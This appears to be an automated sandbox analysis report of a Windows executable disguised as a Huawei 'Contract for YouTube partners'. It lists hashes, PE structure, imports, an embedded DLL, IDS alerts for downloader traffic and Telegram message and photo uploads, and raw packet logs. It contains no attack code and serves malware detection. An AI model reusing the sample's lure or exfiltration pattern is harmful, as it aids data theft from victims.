                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                            Entropy (8bit):3.6121954860344205
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:6+fOVuHIbGzozQLXNJGhjRbd7lzm8DuJE6Un6+Y1ulbYa3IXq:7OV/KxNy7JmT/+LSK
                                                                                                                                                                                            MD5:FBF99E8F48E2BAE63F7E8C5D0F58EA2B
                                                                                                                                                                                            SHA1:A1DD9B7A89F9328684235E6F00114A656B9B2A5C
                                                                                                                                                                                            SHA-256:5C1AAE2A788C9C9620CA35F2A4CB9D4471C1F0243279BB9ADFD113AC70DA3D0F
                                                                                                                                                                                            SHA-512:F45D839801FCFB3BF0ECE465ACD0606ECDD9EB50610FACE748917A13D87A15B7C312F0B821BA11A17ED0EF28A93CB3DA7B8473DE3EFEDE60D85CA22EADE6EC02
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..g...........!.................'... ...@....... ....................................@.................................8'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......0...#Strings....0.......#US.8.......#GUID...H.......#Blob...........W.........%3........................................................................L.E...S.E.................}.....}...............$................................... .............2.........V.]...V.r...V.....V...............Z.....Z...'.....2.Z...E.Z...^.Z...l.Z........ ..$.........

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.out

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (457), with CRLF, CR line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                                            Entropy (8bit):5.3201583621046815
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:KOuId3ka6K2aVETaUKax5DqBVKVrdFAMBJTH:ykka6CVE+UK2DcVKdBJj
                                                                                                                                                                                            MD5:6F153A0EDBF93A05A80983CEAD034153
                                                                                                                                                                                            SHA1:1619DA3A29934D7F1F4975A168F2936AAFB09D33
                                                                                                                                                                                            SHA-256:05867189AA106D697280D4CB8967EA7DBCFBD18AA33539ABACA0F193365A9300
                                                                                                                                                                                            SHA-512:F77F2D8E940BD0227F83EB358659A51C95C72B9A607070C6B0A9C9D20E63FB5C1951D3C32656FBF1268E6B99A09DB23CC28C7F38351DCF1E9449ACF92E5FFB5D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Entropy (8bit):7.939172897483072
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            File size:72'795'027 bytes
                                                                                                                                                                                            MD5:dd0b202977b83e0c52c2537616c7a620
                                                                                                                                                                                            SHA1:2222a2298b601ba778f6b15e6ed93116de5e2662
                                                                                                                                                                                            SHA256:86cea9c754cf8904e57e345cd6e1af7023c60590c5407a92492a7cf5017c89b7
                                                                                                                                                                                            SHA512:21c8235fee361ef02221d209ceb37a528818010bf952d90dc092ede5256b4b8aa04836062895e92af5f8d56ca531c175db2febae0dc662c5d7938cd5a6267716
                                                                                                                                                                                            SSDEEP:1572864:wBcFe++k4HZyHFp3154XnS7NoUt7YYf1ZfQ6LG:wBcFH+k4HZaFqXQjt7YYtZoj
                                                                                                                                                                                            TLSH:D6F72352E2F900E8D4BAC0B8C6575617FBB27855133097EB62648A692F33BE06F7D311
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..N8.DN8.DN8.DG@vDX8.D...EZ8.D...E\8.D...E.8.D>..EF8.D>..EC8.DN8.DF:.D]..E[8.D]..E.:.D]..EO8.D]..DO8.D]..EO8.DRichN8.D.......

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:0544801b6464f40b

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x1405cfea0
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x66E8BB0A [Mon Sep 16 23:11:06 2024 UTC]
                                                                                                                                                                                            TLS Callbacks:0x405cf320, 0x1, 0x405cfae0, 0x1
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:4b1892ce4fbcfcf064c6f69d693fc6a5

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                            call 00007F1C28673E48h
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                            jmp 00007F1C2867378Fh
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                            call 00007F1C28362828h
                                                                                                                                                                                            jmp 00007F1C28673924h
                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                            ret
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            jmp 00007F1C2867390Ch
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            mov dword ptr [esp+10h], ebx
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            mov dword ptr [esp+18h], esi
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            push edi
                                                                                                                                                                                            inc ecx
                                                                                                                                                                                            push esi
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            sub esp, 10h
                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                            cpuid
                                                                                                                                                                                            inc esp
                                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                                            inc esp
                                                                                                                                                                                            mov edx, edx
                                                                                                                                                                                            inc ecx
                                                                                                                                                                                            xor edx, 49656E69h
                                                                                                                                                                                            inc ecx
                                                                                                                                                                                            xor eax, 6C65746Eh
                                                                                                                                                                                            inc esp
                                                                                                                                                                                            mov ecx, ebx
                                                                                                                                                                                            inc esp
                                                                                                                                                                                            mov esi, eax
                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                            cpuid
                                                                                                                                                                                            inc ebp
                                                                                                                                                                                            or edx, eax
                                                                                                                                                                                            mov dword ptr [ebp-10h], eax
                                                                                                                                                                                            inc ecx
                                                                                                                                                                                            xor ecx, 756E6547h
                                                                                                                                                                                            mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                                            inc ebp
                                                                                                                                                                                            or edx, ecx
                                                                                                                                                                                            mov dword ptr [ebp-08h], ecx
                                                                                                                                                                                            mov edi, ecx
                                                                                                                                                                                            mov dword ptr [ebp-04h], edx
                                                                                                                                                                                            jne 00007F1C2867397Dh
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            or dword ptr [001CA16Dh], FFFFFFFFh
                                                                                                                                                                                            and eax, 0FFF3FF0h
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            mov dword ptr [001CA155h], 00008000h
                                                                                                                                                                                            cmp eax, 000106C0h
                                                                                                                                                                                            je 00007F1C2867394Ah
                                                                                                                                                                                            cmp eax, 00020660h
                                                                                                                                                                                            je 00007F1C28673943h
                                                                                                                                                                                            cmp eax, 00020670h
                                                                                                                                                                                            je 00007F1C2867393Ch
                                                                                                                                                                                            add eax, FFFCF9B0h
                                                                                                                                                                                            cmp eax, 20h
                                                                                                                                                                                            jnbe 00007F1C28673946h
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            mov ecx, 00010001h

                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x7966100xc4.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7966d40x168.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8070000x157bb8.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x7ba0000x36108.pdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x95f0000x7e40.reloc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x70a5900x54.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x70a7800x28.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6245400x140.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x61d0000xec8.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x7963c40x60.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                            Sections

                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            .text0x10000x61a73c0x61a80032fb681841ec789e18907ede031c730aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .CLR_UEF0x61c0000xdd0x20014c7c1a772bf5678f6bc4cd70c47286bFalse0.412109375zlib compressed data3.105277605145925IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rdata0x61d0000x17c5020x17c600c0301a93ba6b92ac6c0cdc256d233aa6False0.4177697790009859data5.657411636977683IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .data0x79a0000x1fdc40x9800e570686fc5a365327c9cdeea2c075c0fFalse0.19862767269736842data3.3326535232800643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .pdata0x7ba0000x361080x36200a0a4d8cd5d309cba79b281b718f2e550False0.5047362153579676data6.504683455441252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .didat0x7f10000x380x20036167374d760b7cd2774572f5a2f5b50False0.06640625data0.42693031941489346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            Section0x7f20000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            _RDATA0x7f30000x132080x13400617430a8cd708dda1865fee2910d8a1aFalse0.18454494724025974data5.4827244286074395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rsrc0x8070000x157bb80x157c00d66c62b873ceb3306225c72216c2f173False0.41539275568181816data6.30497099669662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .reloc0x95f0000x7e400x80009686b4d395a684e3d9644cbe525a3eceFalse0.1556396484375data5.447589681185815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                            Resources

                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                            RT_ICON0x8072000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 80630 x 80630 px/m0.0639417958121377
                                                                                                                                                                                            RT_RCDATA0x817a280x24data1.1944444444444444
                                                                                                                                                                                            RT_RCDATA0x817a4c0x24data1.1944444444444444
                                                                                                                                                                                            RT_RCDATA0x817a700x146c18PE32+ executable (DLL) (GUI) x86-64, for MS Windows0.4392890930175781
                                                                                                                                                                                            RT_GROUP_ICON0x95e6880x14data1.15
                                                                                                                                                                                            RT_VERSION0x95e69c0x2c0data0.4318181818181818
                                                                                                                                                                                            RT_MANIFEST0x95e95c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                            Imports

                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            KERNEL32.dllRaiseException, FreeLibrary, SetErrorMode, RaiseFailFastException, GetExitCodeProcess, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, AddVectoredExceptionHandler, MultiByteToWideChar, GetTickCount, FlushInstructionCache, QueryPerformanceFrequency, QueryPerformanceCounter, RtlLookupFunctionEntry, LocateXStateFeature, RtlDeleteFunctionTable, InterlockedPushEntrySList, InterlockedFlushSList, InitializeSListHead, GetTickCount64, DuplicateHandle, QueueUserAPC, WaitForSingleObjectEx, SetThreadPriority, GetThreadPriority, GetCurrentThreadId, TlsAlloc, GetCurrentThread, GetCurrentProcessId, CreateThread, GetModuleHandleW, WaitForMultipleObjectsEx, SignalObjectAndWait, RtlCaptureContext, SetThreadStackGuarantee, VirtualQuery, WriteFile, GetStdHandle, GetConsoleOutputCP, MapViewOfFileEx, UnmapViewOfFile, GetStringTypeExW, InterlockedPopEntrySList, ExitProcess, Sleep, CreateMemoryResourceNotification, VirtualAlloc, VirtualFree, VirtualProtect, SleepEx, SwitchToThread, SuspendThread, ResumeThread, InitializeContext, SetXStateFeaturesMask, RtlRestoreContext, CloseThreadpoolTimer, CreateThreadpoolTimer, SetThreadpoolTimer, ReadFile, GetFileSize, GetEnvironmentVariableW, SetEnvironmentVariableW, CreateEventW, SetEvent, ResetEvent, GetThreadContext, SetThreadContext, GetEnabledXStateFeatures, CopyContext, WerRegisterRuntimeExceptionModule, RtlInstallFunctionTableCallback, GetSystemDefaultLCID, GetUserDefaultLCID, RtlUnwind, HeapAlloc, HeapFree, GetProcessHeap, HeapCreate, HeapDestroy, GetEnvironmentStringsW, FreeEnvironmentStringsW, FormatMessageW, CreateSemaphoreExW, ReleaseSemaphore, GetACP, LCMapStringEx, LocalFree, VerSetConditionMask, VerifyVersionInfoW, QueryThreadCycleTime, GetLogicalProcessorInformationEx, SetThreadGroupAffinity, GetThreadGroupAffinity, GetProcessGroupAffinity, GetCurrentProcessorNumberEx, GetProcessAffinityMask, QueryInformationJobObject, CloseHandle, GetSystemTimeAsFileTime, GetModuleFileNameW, CreateProcessW, GetCPInfo, LoadLibraryExW, CreateFileW, GetFileAttributesExW, GetFullPathNameW, LoadLibraryExA, OutputDebugStringA, OpenEventW, ReleaseMutex, ExitThread, CreateMutexW, HeapReAlloc, CreateNamedPipeA, WaitForMultipleObjects, DisconnectNamedPipe, CreateFileA, CancelIoEx, GetOverlappedResult, ConnectNamedPipe, FlushFileBuffers, SetFilePointer, MapViewOfFile, GetActiveProcessorGroupCount, GetSystemTime, SetConsoleCtrlHandler, GetLocaleInfoEx, GetUserDefaultLocaleName, RtlAddFunctionTable, LoadLibraryW, CreateDirectoryW, RemoveDirectoryW, CreateActCtxW, ActivateActCtx, FindResourceW, GetWindowsDirectoryW, GetFileSizeEx, FindFirstFileExW, FindNextFileW, GetTempPathW, FindClose, LoadLibraryA, GetCurrentDirectoryW, IsWow64Process, EncodePointer, DecodePointer, CreateFileMappingA, TlsSetValue, TlsGetValue, GetSystemInfo, GetCurrentProcess, OutputDebugStringW, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, WideCharToMultiByte, GetCommandLineW, GetProcAddress, GetModuleHandleExW, SetThreadErrorMode, FlushProcessWriteBuffers, SetLastError, DebugBreak, WaitForSingleObject, GetNumaHighestNodeNumber, SetThreadAffinityMask, SetThreadIdealProcessorEx, GetThreadIdealProcessorEx, VirtualAllocExNuma, GetNumaProcessorNodeEx, VirtualUnlock, GetLargePageMinimum, IsProcessInJob, K32GetProcessMemoryInfo, GetLogicalProcessorInformation, GlobalMemoryStatusEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, RtlVirtualUnwind, IsProcessorFeaturePresent, RtlUnwindEx, InitializeCriticalSectionAndSpinCount, TlsFree, RtlPcToFileHeader, TryAcquireSRWLockExclusive, GetExitCodeThread, GetStringTypeW, InitializeCriticalSectionEx, GetLastError, CreateFileMappingW
                                                                                                                                                                                            ADVAPI32.dllReportEventW, AdjustTokenPrivileges, RegGetValueW, SetKernelObjectSecurity, GetSidSubAuthorityCount, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, DeregisterEventSource, RegisterEventSourceW, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, EventRegister, SetThreadToken, RevertToSelf, OpenThreadToken, EventWriteTransfer, EventWrite, LookupPrivilegeValueW
                                                                                                                                                                                            ole32.dllCreateStreamOnHGlobal, CoRevokeInitializeSpy, CoGetClassObject, CoGetContextToken, CoGetObjectContext, CoUnmarshalInterface, CoMarshalInterface, CoGetMarshalSizeMax, CLSIDFromProgID, CoReleaseMarshalData, CoTaskMemFree, CoTaskMemAlloc, CoCreateGuid, CoInitializeEx, CoRegisterInitializeSpy, CoWaitForMultipleHandles, CoUninitialize, CoCreateFreeThreadedMarshaler
                                                                                                                                                                                            OLEAUT32.dllCreateErrorInfo, SysFreeString, GetErrorInfo, SetErrorInfo, SysStringLen, SysAllocString, SysAllocStringLen, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayDestroy, QueryPathOfRegTypeLib, LoadTypeLibEx, SafeArrayGetVartype, VariantChangeType, VariantChangeTypeEx, VariantClear, VariantInit, VarCyFromDec, SafeArrayAllocDescriptorEx, GetRecordInfoFromTypeInfo, SafeArraySetRecordInfo, SafeArrayAllocData, SafeArrayGetElemsize, SysStringByteLen, SysAllocStringByteLen, SafeArrayCreateVector, SafeArrayPutElement, LoadRegTypeLib
                                                                                                                                                                                            USER32.dllLoadStringW, MessageBoxW
                                                                                                                                                                                            SHELL32.dllShellExecuteW
                                                                                                                                                                                            api-ms-win-crt-string-l1-1-0.dllstrncat_s, wcsncat_s, strcmp, wcsnlen, wcscat_s, towupper, iswascii, _strdup, strncpy, strnlen, wcstok_s, isdigit, isupper, isalpha, towlower, _wcsdup, iswspace, isspace, islower, strtok_s, _wcsnicmp, strcspn, __strncnt, strlen, wcscpy_s, toupper, wcsncpy_s, strcpy_s, strcat_s, strncpy_s, _strnicmp, tolower, wcsncmp, iswupper, strncmp, _stricmp, _wcsicmp
                                                                                                                                                                                            api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsscanf, fflush, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vswprintf, __stdio_common_vfwprintf, fputws, fputwc, _get_stream_buffer_pointers, _fseeki64, fread, fsetpos, ungetc, fgetpos, fgets, fgetc, fputc, _wfsopen, _wfopen, __p__commode, _set_fmode, __stdio_common_vsnprintf_s, setvbuf, _setmode, _dup, _fileno, ftell, fseek, fputs, __stdio_common_vsnwprintf_s, __stdio_common_vsprintf_s, fwrite, _flushall, fopen, fclose
                                                                                                                                                                                            api-ms-win-crt-runtime-l1-1-0.dll_crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _register_onexit_function, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _initterm, _initterm_e, _exit, _invalid_parameter_noinfo_noreturn, __p___argc, __p___wargv, _c_exit, _register_thread_local_exe_atexit_callback, _initialize_onexit_table, _beginthreadex, terminate, _controlfp_s, _wcserror_s, _invalid_parameter_noinfo, _errno, exit, abort
                                                                                                                                                                                            api-ms-win-crt-convert-l1-1-0.dll_atoi64, _ltow_s, _wtoi, strtoul, _wcstoui64, atol, _itow_s, strtoull, wcstoul
                                                                                                                                                                                            api-ms-win-crt-heap-l1-1-0.dllfree, _set_new_mode, calloc, malloc, realloc
                                                                                                                                                                                            api-ms-win-crt-utility-l1-1-0.dllqsort
                                                                                                                                                                                            api-ms-win-crt-math-l1-1-0.dllasinhf, atanhf, cbrtf, acoshf, cosh, cbrt, coshf, exp, expf, acosh, atanh, floor, floorf, fma, fmaf, cosf, _fdopen, cos, ceilf, _copysignf, _isnanf, trunc, truncf, ilogb, ilogbf, tanhf, ceil, fmod, fmodf, atanf, frexp, atan2f, atan2, log, log10, log10f, atan, asinf, log2, log2f, logf, pow, powf, sin, sinf, asin, sinh, sinhf, sqrt, sqrtf, tan, tanf, tanh, acosf, _copysign, asinh, _isnan, _finite, modf, modff, acos, __setusermatherr
                                                                                                                                                                                            api-ms-win-crt-time-l1-1-0.dll_time64, _gmtime64_s, wcsftime
                                                                                                                                                                                            api-ms-win-crt-environment-l1-1-0.dllgetenv
                                                                                                                                                                                            api-ms-win-crt-locale-l1-1-0.dll_unlock_locales, setlocale, __pctype_func, ___lc_locale_name_func, _lock_locales, ___lc_codepage_func, ___mb_cur_max_func, _configthreadlocale, localeconv
                                                                                                                                                                                            api-ms-win-crt-filesystem-l1-1-0.dll_wrename, _unlock_file, _wremove, _lock_file

                                                                                                                                                                                            Exports

                                                                                                                                                                                            NameOrdinalAddress
                                                                                                                                                                                            CLRJitAttachState30x1407aeff8
                                                                                                                                                                                            DotNetRuntimeInfo40x14079c5d0
                                                                                                                                                                                            MetaDataGetDispenser50x140571170
                                                                                                                                                                                            g_CLREngineMetrics20x14079bde0
                                                                                                                                                                                            g_dacTable60x140644580

                                                                                                                                                                                            Version Infos

                                                                                                                                                                                            DescriptionData
                                                                                                                                                                                            Translation0x0000 0x04b0
                                                                                                                                                                                            CompanyNameWorkMoter
                                                                                                                                                                                            FileDescriptionWorkMoter
                                                                                                                                                                                            FileVersion1.0.0.0
                                                                                                                                                                                            InternalNameWorkMoter.dll
                                                                                                                                                                                            LegalCopyright
                                                                                                                                                                                            OriginalFilenameWorkMoter.dll
                                                                                                                                                                                            ProductNameWorkMoter
                                                                                                                                                                                            ProductVersion1.0.0
                                                                                                                                                                                            Assembly Version1.0.0.0

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                            2025-02-17T19:35:26.525126+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.649706172.67.19.24443TCP
                                                                                                                                                                                            2025-02-17T19:35:40.469309+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649778104.26.12.20580TCP
                                                                                                                                                                                            2025-02-17T19:35:40.970979+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649785208.95.112.180TCP
                                                                                                                                                                                            2025-02-17T19:35:42.078768+01001810009Joe Security ANOMALY Telegram Send Photo1192.168.2.649792149.154.167.220443TCP
                                                                                                                                                                                            2025-02-17T19:36:07.249077+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64982589.23.97.21480TCP
                                                                                                                                                                                            2025-02-17T19:36:07.262561+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64982489.23.97.21480TCP
                                                                                                                                                                                            2025-02-17T19:36:28.657629+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64996189.23.97.21480TCP
                                                                                                                                                                                            2025-02-17T19:36:28.659655+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64996089.23.97.21480TCP
                                                                                                                                                                                            2025-02-17T19:36:50.028855+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64999589.23.97.21480TCP
                                                                                                                                                                                            2025-02-17T19:36:50.030883+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64999489.23.97.21480TCP
                                                                                                                                                                                            2025-02-17T19:37:11.386733+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64999889.23.97.21480TCP
                                                                                                                                                                                            2025-02-17T19:37:11.402768+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64999989.23.97.21480TCP
                                                                                                                                                                                            2025-02-17T19:37:12.000976+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.650001149.154.167.220443TCP
                                                                                                                                                                                            2025-02-17T19:37:12.044300+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.650002149.154.167.220443TCP

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Feb 17, 2025 19:35:25.467225075 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:25.467253923 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:25.470776081 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:25.485449076 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:25.485467911 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:25.993844986 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:25.993931055 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:26.007406950 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:26.007432938 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.007828951 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.018058062 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:26.059350014 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525146008 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525203943 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525243998 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525264025 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525274038 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525301933 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525322914 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525438070 CET44349706172.67.19.24192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:26.525485039 CET49706443192.168.2.6172.67.19.24
                                                                                                                                                                                            Feb 17, 2025 19:35:26.693206072 CET49706443192.168.2.6172.67.19.24
